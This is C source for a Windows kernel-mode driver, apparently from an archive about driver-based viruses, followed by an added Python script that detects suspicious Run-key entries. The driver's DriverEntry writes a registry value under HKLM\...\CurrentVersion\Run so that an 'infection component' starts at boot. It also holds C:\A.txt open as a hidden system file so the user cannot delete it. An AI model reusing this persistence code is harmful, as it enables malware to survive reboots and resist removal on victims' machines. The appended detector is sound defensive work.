
hello.c

From archive: 2004-03-05_驱动病毒探索.rar (exploring how driver-based viruses work)
Language: C
/*******************************************************************
Copyright (c) 2003 Green Asia Electronics.

Module Name:

    Hello.c 

Current Version : 
	v0.1


Abstract:
	Driver-wide initialization code.

Environment:

    kernel mode only


Functions:
	DriverEntry : 
		Per-driver initialization code.
	
	XGWriter_DriverUnload : 
		Per-driver unload code.
	
Notes:

	Copyright (c) 2003 Green Asia Electronics.  All Rights Reserved.


Revision History:

    Year  Month  Day   Author       Version         Comment
    2003   09     14   HenryShow     v0.1       first version
    2003   09     14   HenryShow     V0.11      asm version, no data seg
    2003   09     15   HenryShow     V0.2      	open c:\\a in kernel mode so that the user cannot delete it.

*******************************************************************/

///////////////////////////////////////////////////////////////////////////////////
#include "Hello.h"
///////////////////////////////////////////////////////////////////////////////////

/*******************************************************************
Current Version : 
	v0.1
	
Routine Prototype:
	NTSTATUS
	DriverEntry(
    	IN PDRIVER_OBJECT  DriverObject,
	    IN PUNICODE_STRING RegistryPath
    )

Routine Description:

    Installable driver initialization entry point.
    This entry point is called directly by the I/O system.
    
    We use this entry point to add a registry value that makes the system run our infection component.
    Typically, we add a value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run;
    its name and data are random and are agreed with the infection component.

Arguments:

    DriverObject - pointer to the driver object

    RegistryPath - pointer to a unicode string representing the path
                   to driver-specific key in the registry

Return Value:

    STATUS_SUCCESS if successful,
    STATUS_UNSUCCESSFUL otherwise

Revision History:

    Year  Month  Day   Author       Version         Comment
    2003   09     14   HenryShow     v0.1       	first version
    2003   09     14   HenryShow     v0.11       	asm version.

*******************************************************************/
NTSTATUS
DriverEntry(
    IN PDRIVER_OBJECT  DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
{
	NTSTATUS Status;
	HANDLE RunKey;
	WCHAR RunPath[128] = L"\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	UNICODE_STRING RegPath = {128, 128, RunPath};
	OBJECT_ATTRIBUTES ObjAttr = {0x18, 0, &RegPath, 0, 0, 0};
	WCHAR FileNameStr[60] = L"\\DosDevices\\C:\\A.txt";
	UNICODE_STRING FileName = {60, 60, FileNameStr};
	OBJECT_ATTRIBUTES FileAttr = {0x18, 0, &FileName, 0, 0, 0};
	IO_STATUS_BLOCK IoStatusBlock;
	HANDLE FileHandle;

	Status = ZwOpenKey(&RunKey, KEY_ALL_ACCESS, &ObjAttr);
	
	if (Status == STATUS_SUCCESS){
		ZwSetValueKey(RunKey, &ValueName, 0, REG_SZ, RegKeyValue, sizeof(RegKeyValue) / sizeof(RegKeyValue[0]) * sizeof(WCHAR) );
		ZwClose(RunKey);
	}
	
	Status = ZwCreateFile(&FileHandle, FILE_ALL_ACCESS, &FileAttr, &IoStatusBlock, 0, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, FILE_SHARE_READ, FILE_OPEN_IF, FILE_NON_DIRECTORY_FILE, NULL, 0);
	
    DriverObject->DriverUnload = DriverUnload;
    
	/*	
	NTSTATUS Status;
	HANDLE RunKey;
	OBJECT_ATTRIBUTES ObjAttr;
	
	// we are only interested in the registry.
	ObjAttr.Length = sizeof(OBJECT_ATTRIBUTES);
	ObjAttr.RootDirectory = NULL;
	ObjAttr.ObjectName = &RegPath;
	ObjAttr.Attributes = 0;
	ObjAttr.SecurityDescriptor = NULL;
	ObjAttr.SecurityQualityOfService = NULL;
	
	Status = ZwOpenKey(&RunKey, KEY_ALL_ACCESS, &ObjAttr);
	if (Status == STATUS_SUCCESS){
		ZwSetValueKey(RunKey, &ValueName, 0, REG_SZ, RegKeyValue, sizeof(RegKeyValue) / sizeof(RegKeyValue[0]) * sizeof(WCHAR) );
		ZwClose(RunKey);
	}
	
    DriverObject->DriverUnload = DriverUnload;
    */
    return STATUS_SUCCESS;
}

///////////////////////////////////////////////////////////////////////////////////
VOID 
DriverUnload(
	IN PDRIVER_OBJECT DriverObject
    )
{
	// TODO: free the memory of all global variables allocated in DriverEntry.
	
}
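A defender-side check suggested by the Routine Description above (a Run-key value with a random name and data): this added Python example is not part of the original archive. It parses a constructed `reg export` text of the Run key and flags values whose names look random or whose data points into a temp or public directory; the entropy threshold, the directory list and the sample entries are assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample of a `reg export` of the Run key (no real system data).
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
"x7Qk3ZpLw9"="C:\\Windows\\Temp\\zk41pq.exe"
"""
RUN_KEY = r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')
# Directories a legitimate autostart rarely lives in (assumption; extend as needed).
SUSPICIOUS_DIRS = (r"c:\windows\temp", r"\appdata\local\temp", r"\users\public")

def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def parse_run_values(reg_text):
    """Return (name, data) pairs listed under the Run key of a .reg export."""
    values, in_run = [], False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_run = line.lower() == RUN_KEY.lower()
            continue
        m = VALUE_RE.match(line) if in_run else None
        if m:
            # .reg files double every backslash; undo that for path matching
            values.append((m["name"], m["data"].replace("\\\\", "\\")))
    return values

def looks_random(name, threshold=3.2):
    """Heuristic: mixed case plus digits and high per-character entropy."""
    mixed = all(re.search(p, name) for p in (r"\d", r"[a-z]", r"[A-Z]"))
    return mixed and shannon_entropy(name) >= threshold

def suspicious_run_entries(reg_text):
    findings = []
    for name, data in parse_run_values(reg_text):
        reasons = []
        if looks_random(name):
            reasons.append("random-looking value name")
        if any(d in data.lower() for d in SUSPICIOUS_DIRS):
            reasons.append("executable in temp/public directory")
        if reasons:
            findings.append((name, data, reasons))
    return findings
```

On a live host the same functions can be fed the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.reg`; a hit is a lead to triage, not proof of infection.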
